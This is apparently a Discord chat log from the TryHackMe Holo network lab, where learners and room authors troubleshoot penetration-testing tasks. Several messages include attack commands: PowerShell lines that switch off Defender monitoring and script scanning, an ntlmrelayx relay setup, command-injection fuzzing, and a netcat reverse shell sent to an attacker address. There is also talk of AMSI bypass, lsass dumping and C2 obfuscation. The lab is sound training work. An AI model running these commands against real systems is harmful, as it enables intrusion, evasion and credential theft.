#holo-network

suck it @chrome cave

It's modified per examples given in the links in the sections. Perhaps you could comment on depicted example not working

Are you even trying to be helpful? It's a requirement to modify it ..

Can you show me a screenshot of exactly where that code is

Because I’ve wrote the course and I’ve never seen that code before

nematode.

First code box section 31, it's obfuscated

But I'm was referring to unmodified version of the second code box, which is depicted in the images of section 32

The image I supplied of my PowerShell terminal are what occurs

Otherwise I wouldn't have deviated in the first place

It's worth noting that amsitrigger does work as expected on the unmodified version of the first bypass from section 31

so then why not stick with it

I can’t help a lot if you’re jumping a bunch of places

so from my understanding the Powershell screenshot is of the BCsecurity bypass?

yes

@wind bobcat haelp I’ve never seen that error

why ? we can't get the domain admin without S-SRV02

we can

yes of course you can if you try Zerologon / Printnightmare which are not recommended. but personally I don't see how you can get a session with the remote ntlmrelay technique, the domain admin is supposed to connect to the FILE-SRV01 shares from the S-SRV02 machine, so if S-SRV02 is not operational you will not receive any SMB connection

well i can atleast say it works. have tried it out myself

when did you try it ?

when it was released

I see, it seems to be a recent problem, at the time of the release S-SRV02 was operational

what's the problem with s srv02?

like if u are talking about the trust relationship issue it existed always

No it's not the trust relationship issue, S-SRV02 doesn't send SMB traffic to FILE-SRV01, I checked with wireshark, there is nothing, so I can't get a session with ntlmrelayx

not in that sense. the machine is operational, like I told you, reboot the network.

I already did

nothing has changed on SRV02 since release.

@sterile epoch have you ever seen this error

This link (https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/master/ASBBypass/Program.cs) in task 31 doesn't exist, pretty sure it's here (https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) now

Pretty sure Rasta and Hubble are just messing with us at this point changing the directory structure every week

you could just link to the repo

the Rasta one is easy to find but the BC-Sec one is deep in there

Looks like defender might be blocking it. Then just updated a ton of detection stuff the last week or so

But if you use loadassembly from powershell it doesn't always tell you that it failed to load because of amsi. Sometimes you get errors like that

https://github.com/BC-SECURITY/Empire/blob/master/empire/server/common/bypasses.py

task 28 passing the leaked token via cookie seems not accepting, Can anyone give me a hint to make this?

youre not passing it via the cookie

youre retrieving it via the cookie

hey anyone know how to escalate privileges in LSRV01

using docker

exploitation

Actually when i see for the SUID bit I got the docker and when I try to do it asks me a password

I tried both the password that I have found in the machine but didnt work

you don’t need a password for the privilege escalation

you’re copy and pasting the command from GTFOBins without understanding it

can you explain me how its done ?

well, for one, the first line is copying the docker binary to your current location and two it's setting the SUID bit

this is explained in the gtfobins page

and the last command is pretty easy to digest, you just need to read.

Yahh I Got it thanks man

Gave +1 Rep to @wind bobcat

Oh shoot, I was supposed to look at that

@wind bobcat I’m fairly busy with getting school sorted could you look at that?

TLDR just intercept and look at the JS

How do you turn off Windows Defender completely? I turned off real time protection but it’s still quarantining stuff on my test/dev vm.

registry foolishness

AV Evasion hard :/

I’ll get it soon enough

Need help on task 13. I have all subdomains in my hosts file and I discover the
What file is vulnerable to RCE and the pram - but I just get a 404 when I try command injection.

shouldn't be /admin/

I tried that too, but I get a 302 redirect.

to inxed.php

*index.php

I can see the vouln pram in the .php file

I'm at a loss at this point 😅

Like this?

that would be due to an invalid cookie

hello just for clarification because i am redoing the network to gain more from it in the the task 12 says that we use LFI to bypass the 403 error but in theory we don't include files we read the file from the server to gain the the creds to log in the admin panel so isn't it a directory traversal attack? thank you in advance

oh I forgot about that task

so in a way yes. Youre using directory traversal as a part of LFI

hm yes exactly but if it was an lfi we could get a shell from it am i right? thank you

not really. You would have to chain other things to it to get RCE

It is an LFI exploit

but youre also using directory traversal through the LFI to read files

Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows.

correct

thank you!!!

you can also gain rfi through it

ay dios mio, building ThreatCheck, anyone done that?

https://github.com/Sq00ky/Compiled-Binaries

thank you!

Gave +1 Rep to @livid shoal

can I ask for a nudge from someone who has done Task 29?

ok this is silly. My custom http profile is not changing the code one iota, threatchecker says so. Am I missing a step here? 1. set custom profile with the new headers 2. click generate stager 3. copy code of grunt 4. use threat checker?

ohhhk so yea it does change it (when you download the binary from covenant) but then you can't edit the grunt template (or can you) to get thru the next detections?

hey guys I need your help on mission 20. I've tried to find some SUID binaries and found docker. When trying to PrivEsc I noticed that I cant root the machine using the GTFObins payload

The machine is not connected to the internet, hence I cant obtain root

any help please?

you can't just copy and paste the command

oh

as spooky said, you need to understand what it does and modify it

ok, thanks

got it! thanks

why doesn't it work with the right name (||u.....||) then?

can someone give me a hint what I could be doing wrong with the proxychains.conf?
I've set chisel up on attacker and target and done the proxychains.conf on attacker as described, but ping won't work (neither to .33 nor .1)

ping won’t work with proxychains, only sshuttle

you’ll need to use other methods of verification

iirc sshuttle doesn't carry icmp eithrr

hey, so in the windows web server, we upload a payload and download and execute the stager to get a reverse shell . SO i was writing this report. Can "Do not run web server with elevated privelages" be a possible solution? because the reverse shell gets us straight to nt authority. Is that right or will this always work no matter what user the web server is running from?

oh! ok thx! 🙂

okk.. ty

Gave +1 Rep to @wind bobcat

Morning all, is there anyone around who can point me in the right direction on the syntax required to put the AMSI bypass into the GruntHTTP stager binary? I now have a clean binary as checked by threatcheck.exe, after making changes to the listener profile and the GUID string builder in the C# template.

I'm in the position where my binary is not getting flagged by defender, but when I run it on a windows 10 VM I am getting "Illegal Characters in Path", I have followed RastaMouse's guidance to change the string builder in the executor - but I get the same error message with and without

I’ve been on this one task for more than a week but I have to say I have learned so much it is unreal. What a fantastic learning experience. The AV bypass stuff is super interesting. Does anyone know if there are any tutorial rooms that break down AV bypass techniques into smaller discreet sections?

You can add an exception to the folder where you store your binaries and powershell scripts. You can turn off AV in the local group policy editor and making a change in your registry but it is much easier to create a folder for your test files and add that as an exception to Windows Defender. I then temporarily switch off real time protection, copy the binary from my host OS into that folder.

# disable scanning all downloaded files and attachments, disable AMSI (reactive)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true

# disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1 

That does not disable it completely but good enough to proceed

That prevents privilege escalation on that machine but the attack is still there it doesn’t do anything about that

You dont. Well. I would recommend it. In theory you can add it to the beginning but that’s just going to be a pain. Just toss it into a file with the launcher code it generates. Also if you clean the code you don’t need and AMSI bypass really

It’s in the works

Could you send a screenshot of this?

yes but we wont get ntauthority then right?

Currently yes

But either way the attack is bad

I wouldn’t accept that as a valid mitigation

Cough cough check the filtering cough

yes yes I am writing about the filtering but was just thinking to add this too that if by anychance someone could bypass filtering, they cant get the administrative rights.

It would be a privilege mitigation but not an upload mitigation

right thanks

This is a copy of the GruntHTTP. However I get the same error message with GruntHTTP if I switch real time protection off to get it onto this VM.

And you don’t get that with a non modified grunt?

I would check over all your modifications again make sure you didn’t include anything weird that would cause that

So I get the same with the standard HTTP Grunt - I had to switch off real-time protection on the VM to get the binary on to the VM

I'll redownloading covenant and making sure I haven't accidentally changed something

@lone spruce one thing more, If I write in report that i disabled antivirus for mimikatz to run, would that be considered as a bad thing?

Yes

Reinstall, if it happens again open a GitHub issue

Then how can i not? like i tried everything running mimikatz from memory. no matter what i do it always gets detected

Build your own custom mimikatz, check this : https://www.youtube.com/watch?v=9pwMCHlNma4&t=1590s&ab_channel=IppSec

I redownloaded Covenant, reset the HTTPGrunt stager code by copying from GruntHTTPStager.cs and then regenerated the Launcher to the same result. I'll look at raising an issue on github.

Just to be sure I rm'd my original installation entirely and started from scratch - same result.

hey but i just wanted to know that if i am using amsi bypass with Invoke-Mimikatz.ps1 file why does it still detect

like it shouldn't right?

because the amsi has already been bypassed?

like what i did in my earlier payload was creating a ps1 file and having amsi bypass in first half and reverse shell payload in second and it successfully executed that

Its so difficult for getting defender not detecting the file

I am doing this room like 10th time maybe but it just doesnt work without disabling detection. Even tried making custom mimilatz but it always detects

or can we do something like using procdump to dump the lsass and use mimikatz locally ? will that be a good idea and not considered as loud?

clean mimikatz

AMSI bypasses arent the end all be all they are just one piece to the puzzle

oh ok. and what about dumping lsass and downloading it to the attacker machine. Procdump shouldnt be detected by windows most probably as it is a signed software or i am wrong?

https://github.com/cobbr/Covenant/issues/332 - Done, hopefully that is helpful.

Are you using HTTPS?

If I change it http:// nothing loads

Try to disable also the Cloud Delivered Protection, not only the real time protection

Exactly the same result - thanks for the suggestion

Gave +1 Rep to @wise raft

yups covenant didnt work for me either. so i went with a simple powershell reverse shell

Thats my next effort - thanks

Try this modified version of Covenant, It worked for me : https://gist.github.com/S3cur3Th1sSh1t/bf5935b5bff48f9f63bdbb4bcc9e8e3d, if you want to understand the details of the script, check this article (Covenant Section): https://s3cur3th1ssh1t.github.io/Customizing_C2_Frameworks/

@spark kayak I asked around. They suggest asking on the bloodhound slack

Thank you very much I will certainly look at that!

Gave +1 Rep to @wise raft

Thanks Cry. I’ve not used slack before, I’ll look into it.

Hi Manan - which powershell reverse shell did you use?

revshells.com

I have tried the alternate version of Covenant and interestingly had the same output with the Powershell as I did the binary payloads - real-time protection off. It was driving me insane and I wondered if there something wrong with my setup, so I tried a simple netcat connection to a listener on kali and then generated an msfvenom reverse shell - both of which worked fine. I'm going to give Powershell Empire a go.

Thanks man - I finally have a working powershell reverse shell on test VM that bypasses AMSI and Defender

Gave +1 Rep to @livid shoal

welcome :)

Guys, I have problems in task 37, I cannot authenticate with the user w----t and its hash. any ideas??

use rdp

:)

with password

I cant dowload openvpn config every time I try I get 404

Why can't I run Procmon on the server?

Because you don’t have permissions

there is no need to run procmon on the target

because u dont

So how could the hijacking dll do?

download the exe running there

and test it on a

sandboxed

vm

ok, thanks !!

how I can download open vpn config ? every time i try to download file I get page 404 not found error

On the Tryhackme website, in access

I can access the page but download button doesnt work

I get the same error

After having put the dll in a path, how can I run the binary so that it loads the dlls again?

again u dont. its a scheduled task just wait for it

I waited 5 min and nothing

support team has been made aware

Wait. Spooks. We’re the support team

https://tenor.com/view/pedro-monkey-puppet-meme-awkward-gif-15268759

thm support team nimrod

You lost me

jabab

What does jabab have to do with a scheduled task

lol

try resetting the network. it should work. or maybe u doing something wrong.

@devout crater from the ss you sent, yes u are doing it wrong

just try making a google search about it

the very first url will help u

hey, do you guys also having problem with vpn? it keeps d/c me every 4 minutes; don't we miss the keepalive in the *.ovpn?

ok, thanks bro !

Gave +1 Rep to @livid shoal

the VPN issues you dimwit

uuuuh

Is the server still broke?

@rigid hemlock @candid pendant

And can you DM me your oepnvpon output log

oieon

OpenVPN*

Please:)

sure right away

thanks @earnest hornet ! refreshing the *.ovpn from the THM site worked wonders!

Gave +1 Rep to @earnest hornet

S-SRV01 web-server Seems down,

it can be pinged from L-SRV01 but the web server not responding

Connection refuse to the curl request

Can any one help me?

I am in the latter part of the room, so any help will be highly appreciated.

have u url encoded the curl command?

is anyone else having trouble connecting to admin.holo.live?

that's not a real hostname , is it?

Can someone who has done the hijacking dll help me?

Does anyone know if the expected answer for task 43, the vulnerable application is in scheduled tasks? Or did you use some other task?

do we have a smb-share in DC-SRV01 ?

does holo require much .net development? if so, can that be done from linux or does it pretty much require a windows dev box?

It does and it can be done through linux but you cant test anything

It does unless u can get some compiled binary from somewhere. Or if u wanna clean the c2, u can compile it again. But apart from that too, windows box is still required ahead at some point to test for dll hijacking.

Hey guys ... need help in uploading file in S-SRV01

hm. I was able to build a .net on linux in werath... I just don't know if the capibilities are on par. seem like i will set up a windows vm (SIGH) and try it both ways.

I need to set up the NTLM relay from the PC-FILESRV01 to the DC right? and not from S-SRV02 to the DC?
So in the that case (from pc-file to dc), i will need to turn off SMB services of the PC-FILESRV01 right?
cause actually tried by disabling smb on PC-FILE but won't be able to start a socks proxy on the DC USING ntlmrelay

u need a persistant connection to lsrv01 too

Submitting report for holo in like 5 seconds 👀

fingers crossed

and done!

omg

👀

congrats to @livid shoal for submitting the first report

cc @lone spruce

@wind bobcat gib

you've been gave

woah I am the first?!?! wow thanks :)

Gave +1 Rep to @wind bobcat

Does L-Serv01 restart if it crashes? I was getting a response and not getting any response now. I've tried regen of vpn.

I gotta used picture today

Wanna see?

Damnit phone, why do you keep opening here?

do anyone have the same issue with covenant thread pool starvation. ?

and then it overloads the vm

How do I compile Seatbelt for the server? I tried with various versions but it is still trying to download missing .net 3.5 (includes 2.0 ...)

Did it work? why would I put it there?

No it didn’t work, you shouldn’t put it in the desktop

How did you get it working?

Finally done. Whoop

well done

Finally done. Thank you all very much for the help provided !!

Im having trouble with the /etc/hosts configuration

10.200.194.33 holo.live

is this ok?

i cant acces vhost but i can list them with gobuster

You'll need to add an entry for each that you find

So if you found test.box.thm then you'd need an entry for that

ohh ok! thanks!

When i try to logon to the S-SRV02 via rdesktop i got an error "The trust relationship between this workstation and the primary domain failed" is that wanted?

it's not intended, it's technically a bug, it's an issue we can't fix

basically, even if you could logon to the device, you'd get kicked off in about half s second due to that device being starved for resources

So what i can do to end the room now? Switch to an another subnetwork? (actually on the .69 net)

g'evening

Until when the report must be submitted?

Before 15 September iirc

i cant still not download the openvpn file allways get 404

Is the timer of the scheduled task quite long? I managed to catch a shell once, I then disabled SMB rebooted but I'm not getting my shell back. I can log in as the user found earlier, all my poisoned dlls are present but they are not being triggered

hey everyone. Ive been on this room for a couple weeks. spent a long time on av evasion and getting my binary to bypass detection. Im now at the file upload stage and while im receiving a succesful upload message, i havent been able to find the location of the file. Id appreciate help thanks

Hi shay - I dm'd you

Can someone help me please. I have redone task 47 about 6 or 7 times with slightly different combinations, but I cannot get authentication against the DC. I now have persistence on .35 I have reset the network about three times. I have not altered any passwords, but I did add an extra local account on .35. SMB was definitely off before I started ntlmrelayx.py.

Does anyone know if there is another way to get the last flag - I really want to put this to bed now.

how do you detect the missing dll via process hackeer 2?

@wind bobcat can I dm you a question about holo network?

im very lost in the creating the amsi part 😩

you can post your question here

Think I figured out a way to authenticate to the broken S-SRV02 machine but if there is no other way other than ||NTLM-Relay||. To Auth with the 02 machine. Than I want to ask if I could be provided a valid set of creds so I can figure out if it would work or not.

you shouldn't be attempting to auth to S-SRV02

authentication won't work para nada.

@wind bobcat well I can't prove anything since I don't have valid creds to auth/pass/0r relay since the STATUS_TRUSTED_RELATIONSHIP_FAILURE Error.

you don't need to prove anything, this is me telling you that authentication to S-SRV02 will not work

I have like half a proof.

that's why I'm asking for creds to test my theory...

for the borked machine

authentication to the machine will not work

period

can you give me the info to at least try?

the SAM database doesn't work

LSASS won't work due to the fact that it's not trusted by the domain controller

well I can get it to say creds invalid so idk

since the machine has been restarted since it has been cloned, no credentials are in the LSASS database

idk what you have tried

everything

it's a combination of the issue of resource exhaustion and a trust failure

if nothing works I gain nothing from having creds to test

I have done everything else

just want to answer this question.

I can't give it to you.

well then I can't test anything

exactly, this is me telling you no

kek

How does one help make tryhackme better if they can't test anything

I myself am currently in the process of leaving THM in terms of content creation, so it's not my authority anymore.

ok

plus, proprietary scripts live on that machine so that's yet another reason that I can't Grant access to the machine :p

the machine was deemed to add no value to the network.

Well I found value that I would like to test.

;'..;'

the machine isn’t working

you’ve gotten an answer

@lone spruce I need your help may I dm you

coming to me when spooks said no isn’t going to change anything

again

no you may not

ok

There should no longer be any questions connected to that machine

there is no reason to attack it

I'm trying to improve my windows skills. I see something I just need help testing it since there is no way I could get it because of the STATUS_TRUSTED_RELATIONSHIP_FAILURE

the local admin account is the only way to gain access, since there's an issue with the SAM database, there isn't a way to access the local admin account.

We didn’t just pull the machine for no reason

You’re not going to fix that error. It’s broken as stated many times

AWS gods just said, nah

well idk what else to do. Other than solder on alone.

@tardy idol I’m confused what you’re even trying to do? There is no relevance to that machine anymore

@lone spruce I guess that doesn't matter anymore.

Oh

I just read back over the conversation

we can’t just give you over machine creds

this has been looked over by a lot of people and we have concluded it is a deeper issue than it seems

It's ok just got excited over nothing.

@lone spruce is this a broken part of the network that should otherwise be functioning?

@wind bobcat

@signal lava I DMed you babes

kk

i just crashed s-srv01 server

is there a way to reboot it ? it have only one vote

@zenith delta what sub net are you on?

@zenith delta if no one is there to reset you can add one vote every hour

im on 10.200.183.xx

okay

I'm on 186 I can't add a vote....

okay np

Morning everyone (just after 4am UK time), I was just wondering if there was anyone around who had a chance to look at my issue on the last but task?

I am failing to authenticate to the DC using ntlmrelayx

I have tried resetting the network a few times - I have followed the instructions to the letter but I just can't seem to get that last part. I am on the 192 sub.

type socks

when ntlmrelayx is running

if no socks route is created, you have to create one to the l-srv01 with sshuttle

ntlmrelayx.py -t 10.200.192.30 -smb2support -socks
sshuttle -r linux-admin@10.200.192.33 10.200.192.0/24 -x 10.200.192.33

so in order I join the VPN

run sshuttle

then get my metasploit shell from .35

run the ntlm relayx

and then add the portfwd in meterpreter

I can also run wireshark on .35 and see the refused authorisation

I bet I am doing something really stupid but for the life of me I can't work it out

@spark kayak try this

also use smbexec if not already

@spark kayak if you run an nmap script scan against the DC does SMB signing return enabled or disabled?

enabled but not required

sshuttle will cause weirdness with scanning so please use something else

huh

well double proxychains seems complicated 👀 sshuttle worked for me

literally type the word 'socks'?

don’t scan over sshuttle

yes

that’s dumb

but how would you do it with chisel then? double proxychains how?

You don’t need a double proxy for scanning

use chisel instead of sshuttle to get on to LSRV01?

or direct to FILESRV-01

well, sshuttle worked for me dk if somethings weird for u? type socks in ntlmrelayx input field. u will know if even a socks relay is created or not

I'll give it a go thanks

socks
[*] No Relays Available!

is my syntax for sshuttle wrong?

sshuttle -r linux-admin@10.200.192.33 10.200.192.0/24 -x 10.200.192.33

in your command here, you don't have smb://10.200.192.30. Did you do that or no?

no!

I'll try that now

if that doesn't work, going down the list:

• Did you install these two packages? apt install krb5-user cifs-utils
• Are you using the latest version of impacket? If so, this might be a bug in the current version. It was tested on v0.9.22 and confirmed working.

I installed the first two packages. I'll give a different version of impacket a go. thanks

got the same result with smb://

[] SMBD-Thread-11: Received connection from 127.0.0.1, attacking target smb://10.200.192.30
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[-] Authenticating against smb://10.200.192.30 as HOLOLIVE\SRV-ADMIN FAILED
socks
[] No Relays Available!
ntlmrelayx>

it was the impacket version!

changed to 0.9.22 and it worked first time

thank you very much!

Gave +1 Rep to @wind bobcat

cool, good to know

cc @lone spruce

Of course it was god awful impacket

Thanks guys I'm so pleased. I have put a lot of time into Holo over the last couple of weeks but I have to say it has been an amazing learning experience. I feel like I learned so much from where I dead-ended myself and had to work my way back out. The AV bypass section is brilliant and I have to say I felt pretty ninja when my bypass worked. Thanks for everything again!

I added a couple of troubleshooting steps to the task @lone spruce

hololive openvpn still not downloadable 404 error

cc @earnest hornet

@clear zephyr Can you check the HoloLive VPN server please? :)

Hi ! I'm having some difficulties with task 10 : I can't find the file that leaks the server's current directory. I managed to answer the 2 other question in the task though. I used go buster to enumerates the file of the 3 subdomains with the -x parameter set to html,php,txt. Can someone tell me if I missed something please ?

you likely just overlooked it. It should definitely be in your scan results

if not, this is a file you should check anyways

Found it ! Thanks ! I feel kinda dumb as it's a thing i usually check ^^'

IM having some problems with the vhost enumeration, could anyone assist with where I am going wrong please?

scrap previous I was being lame

hey

can anyone tell me what should I have to do with AV evasion

is it just a theory or I have to practice it on the machines ?

it needs to be done

not theory

Hello people, I finally completed my report and wanted to send it in but my sub expired. Can anyone send the email where to mail?

reports@blacksunsecurity.com

Thanks 😄

I hope the THM gods liked it

ree

thank you whoever that was

Cry, how many submissions have there been?

dos

Tres by tonight

@lone spruce can I DM you something trivial?

Hey gang, just got the THM email and Holo sounds cool.

Where it says “subscribers only network “ is that just the regular £8 subscription or do you have to pay again just for the Holo network?

the standard thm vip sub

Thanks for replying 🙂 I’ll resub to check it out

Gave +1 Rep to @wind bobcat

is extreme lag on mysql, task 17 normal?

like 30 secs to return databases

didn't u won a sub

👀

in the giveaway

Nopes

None that I know of

Wait, did I?

Thanks @livid shoal, I just noticed it.

Gave +1 Rep to @livid shoal

lolllllll

I'll save it up for later as am taking sometime off Ctfs and focusing on completing all my pending projects

yeah

@woven lava btw I finally found a way to dump the creds

without getting

detected

:)

Me too xD

Lemme DM you

lol yea sure I'll too

Hey Cry/Sapuki can you just confirm if you got my mail, else my anxiety would go

you sent something?

Yes, a report 👉 👈

I didn't get a report

spooks

Im going to hurt you

LET ME HAVE MY FUN CRY

Lemme check

smh my h

yes we received the report, were looking it over now, lol

Thanks

I hope you like it :))

The Anxiety when someone reviews your work

👀

did you receive my report?

no szy

:(

just submitted my report 🙂

recieved

pulling my hair out with the rce fuzz in task 13 lol

make sure you use a valid cookie

so use the -b and add the phpsessionid for once I have logged in?

if that's what the particular syntax is for the tool you're using, then yes

may I dm you my syntax as I don't seem to be turning up much in the way of results lol

you can post it here

ok

||wfuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 2||

syntax looks right, you're just missing the cookie

doh I copied the wrong text apologies wait a second

||└─# wfuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -b PHPSESSID=j89rsbijtc59mdr9vdmhvptee4 -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 2||

converting markdown to pdf to your desirable liking is a skill on it's own imo

Network 10.200.69.xx needs a reset, L-SRV01 only comes up with ssh, no web anymore
And vote for reset is not within range...

remeber to vote once per hour

yeah, only 25 to go now 😛

@wind bobcat Is tehre any faster way to reset?

@timid coral @river summit yes, by leaving the room and re-joining until you get assigned to a subnet that isn't for testing (like .69. is)

it got a lot of people assigned to it by mistake, if you get reassigned to another one, those won't have as many people

oo. forgot about that. thank you for reminding me

ahhh, nice thaks

cc @outer junco network range full?

thank you 🙂

Gave +1 Rep to @river cradle

Hi there ! I want some hints on task 40 . Still not find out the way to execute sealbelt.

I executed applock-bypas-check.ps1 and found some path. But I try it all and that is no way to execute exe.

What do you mean no way to execute exe

that could mean a variety of things

hihi cry

Scanning the webserver is telling my port 80 is closed, but the question is asking me what service is running on port 80 😐 Could someone give me a nudge in the correct direction

woah so many people sent reports lmao 😂 I thought competition was not thathard

U will win

I won't

Is anyone available to assist with task 13 please?

Do we get like feedback on the report we submit? Albeit short bullet points of improvements to make, not like a teacher that reviews your assignment paper?

I have a minute or two, just ask the question here

curl -vvv --cookie "j89rsbijtc59mdr9vdmhvptee4" http://admin.holo.live/dashboard.php?cmd=whoami I am getting a 302

I am not sure what I am doing wrong here lol

I used -b $'PHPSESSID='"$PHPSESSID" for the session id, either way I think you need the PHPSESSID part to tell the server what it is

I will give that a go thanks

I actually did it in a browswer with burp, then went to the history and copied the request as curl command, then just turned the session id into an environment variable to run it as curl

but no reason you would need to do all that

The page is loading now correctly so deffo the right cookie command, just no whoami returned lol

oh bloody hell it was there the whole time

lol

thanks @timid coral

🙂

so was the term "PHPSESSID" required?

Yes, and the output was being put into the visitors today field on the page when rendered, I was expecting it to be returned in the response source like a lfi would, today I learnt lol

Cool 🙂

cmd=nc -e /bin/sh 10.50.XXX.XX 1234 HTTP/1.1 is not working I am positive it is because the command is being broken up in the request, any pointers?

is holo god is here

lol

ah i just copy pasted the rev shell command in a browser lol

is there anybody who nmap scan still showing web port and sql port

url encode your spaces. s/ /+/g

on which subnet?

10.200.186.xxx

yea- not my subnet, sorry, cant answer

is your working

yea

took -for-ever- to start tho

https://tenor.com/view/sad-baby-frown-cry-tantrums-gif-4649018

https://tenor.com/view/bunny-rabbit-sad-tired-drag-gif-11453485

mine 2 ports are down

and 1 day left

About the only thing I can suggest without more information is to restart the network

Can i access holo even after my subscription ends and the room isn't completed?

no

Hi. According to the script applock-bypas-check.ps1 output. I enumerate it all by the follow step: first I check if the folder is writeable to my current account. Then got one folder can write file to. Then I copy the exe file to this folder than execute it. It prompt Access is denied . It is the first time I try this tech and please tell me what I was doing wrong.

Awesome. I found that there is a reference. Now I understand it.

Anyone able to give me a small nudge. Task 8. Ive tried multiple nmap scripts. I am not getting any ports open other than ssh. Is it user error? Or is something not working

nvm, today port 80 is showing up. I could not for the life of me get it to display last night

hard to know if it's user error without seeing your nmap command 🙂

you can just... leave the room and then join the room again

Its working now xD. The suggested scan. Then when I couldnt get it I tried a bunch of others. Today, just the regular scan works

I kinda feel likesome of the .33 is... finiky... a bit unstable and can occasionally take a LONG time to come up

Like I gave it 20 minutes from a reboot earlier and didn't see it, so I went to bed and it was up later

xD no worries, I appreciate it! Most of the time its user error (IM a noob) good to know that isnt the case this time xD. I thought I had a basic understanding on nmap. Was confuzzled

Leave and reset both done but nothing fix

oh, I meant that'll fix the when the room expires part.

Ok

Then ill join after 2 days

Access denied is not the same as cant run the exe. That means youre attempting to run/write to a directory you dont have permission to. You need to find a directory that is whitelisted and you have permission to write and execute within

Thanks. I have read the reference and the .ps1 script and learn how to bypass.

Gave +1 Rep to @lone spruce

holo... doesn't seem stable.

it seems like every time it expires and shuts down, it has troubling coming back up

Hi, what is the difficulty of Holo Network? I'm trying to decide between Throwback and this one

Holo IMO is harder than Throwback but Throwback is larger

thats literally out of our control. In all of our tests weve never seen that happen

Now when people think they need to throw an absurd amount of threads at the machine it shits the bed but that isnt on startup

I understand, but it is very frustrating.

Luckily for me tonight, the outage is exactly when I need to set up covenant

I THINK it happens when someone hits start before it's fully stopped. I think I'm going to get it 5 minutes after state chagnes to sopped in the future

I am having trouble connecting to the internal db in task 17, Im not asking for answer, just wanna run my syntax past someone who knows as its behaving odd
It was executing the commands however I could only see the output after typing exit.....how odd

If you're not in an interactive shell MySQL will act like you're passing in raw SQL queries from a file. Spawn a interactive session with python pty for example and it will show you a MySQL prompt @worldly spruce

Ah that was my thought, however everytime i try to spawn the python tty nothing happens

How are you trying to spawn it?

python -c 'import pty; pty.spawn("/bin/bash")'

Try python3 instead

ok

perfect thank you

Gave +1 Rep to @river cradle

w-data@1fd567f26ccb:/var/www/admin$ stty raw -echo;fg stty raw -echo;fg bash: fg: current: no such job

I'm using ZSH fyi

That's for when you background netcat

Ctrl+z first

sooooo frustrating this network, I can only assume someone is breaking the admin login page with over zealous fuzzing?

~~what if u dont have to fuzz for it? ~~ I mean i didnt lol

I mean I am trying to crab a session cookie and cant even log in keeps stalling on login to the dashboard lol

well well, it didnt happen to me. weird it happens with u. give it a reset

maybe

I think it is browser caching, I cleared cache and voila I got my login to work and cookie, now I am on task 18 wish me luck

Is there an issue with the network? I am unable to connect.

It's showing the initial access port closed, which was open yesterday. Any hints? If I am doing wrong?

Aah people nuking the server again?

so 1) your network is not the same as everyone's network. if you don't say which network you are on, I don't know if MY 10.200.X.33 being up means anything to you

2. (and this is based on my assumptions) if the box expires and shuts down, give it 5 minutes to finish sutting down before restarting it.

I think, there is an issue with the network. Maybe someone has closed port 80 on the initial server.

It's not one network for everyone.
If you want to report an issue like that, please state the 3rd octet of your network IPs

Sure, It's not working the 10.200.69.x/24 network.

that one, I am to understand, has a uninentionally heavy user-load

Hi ! Any hint for the FILESRV01 priv esca can I PM? I am getting stuck on identify the exploitable app.

Okay Okay. It worked a few minutes ago.

post it here what you think

Thats the message I get when I ask questions lol

for example....I am thinking I have forgotten something as I am trying to privesc on task 20 and don't have password for www-data to perform the intial priv esc lol

Anyone help with my quandry above ^^ lol

for zsh

1. get a shell.

2. python3 -c "import pty; pty.spawn('bin/bash')"
3. control z
4. stty -a and find rows columns
5. stty raw -echo;fg
6. press enter twice
7. stty rows your_rows columns your columns
8. export TERM=your term

ah I meant my other question lol, I am trying to priv esc on L-SRV01, got the binary I need to exploit but I dont seem to have the www-data password...have I missed something previously?

u never have www-data password

:)

Any hint haha I have hit a brick wall haha

Ahhhh sql?

yes

also till the pc file srv01 everything is well explanatory in the tasks

hey can anyone give me the hunch for the post exploitation task in SRV01

specifically for the cme

I get that, however the specific priv eac requires sudo being ran as a pre req

I think the web server crashed 😦

its back xD

Being a noob again.. Any ideas why gobuster isnt giving me any output once it completes. User error, or is it b ecause the webserver keeps crashing?

suggested script, using suggested wordlist

use wfuzz

plz

AH crap, alright, ty.. Never used wfuzz before. Atleast somewhat familiar with gobuster. I will give that a shot

@nocturne rover would this be -u <IP> .... -H "Host: <IP>"?

FUZZ.<IP>

I think I got it working. Web Server keeps crashing and timing out after a few minutes tho 😦 I limited my threads. Hololive is too popular I think xD

Fuzz = fuzz.example.con

What command you used?

ty, I did it right. Need to work on it when not so many people are on I think

wfuzz -u <IP> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<IP>"

Limited threads with gobuster

not wfuzz, Ill try it again

Specify -hc and -hw

To limit 404 and the word number that dont make sense

Gotcha, really appreciate the help! Honestly too much of a noob to be trying an entire network, but..... It looked interesting

ex.
wfuzz -u https://TryHackMe.com -w /usr/share/SecLists/... -H "Host: FUZZ.tryhackme.com" -hc....

ty!

I got it running. Cheers fellas 😄

Ill share the loot when I win this! lol

Anything wrong here? wfuzz -u 10.200.69.33 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404 -H "Host: FUZZ.10.200.69.33"

Anyone know if ill be able to use the attack machine to work through the holo network? Can't use my pc to connect to the network atm and don't want my access expiring

@hasty galleon Yeah you should be able to - I'm pretty sure it will even have your access configuration in it as well already.

Oh yeah you're right on that. Thanks appreciate it.

np

cry whats happening with the finals tasks about relay? why no traffic comes?

Wish I could help, Im stuck on enumeration xD

set the timeout super high. see if that gets it done

i have like 5 days stuck on the msi i dont know where to start

i would pay someone to help me

Anyone able to tell if 10.200.69.33 is up? Nmap scan is showing it as down and not sure if its me doing something wrong.

Everyone on the 10.200.69.X network please be patient we’re investigating an issue with AWS currently

cry does the ntlmrelay works? or not

in the final tasks

thank you in advance because i had troubles

Why wouldn’t it

i use sshutle and correctly use responder to listen to my tun0 interface and still nothing happens

If you’re using responder then you didn’t fully read the tasks

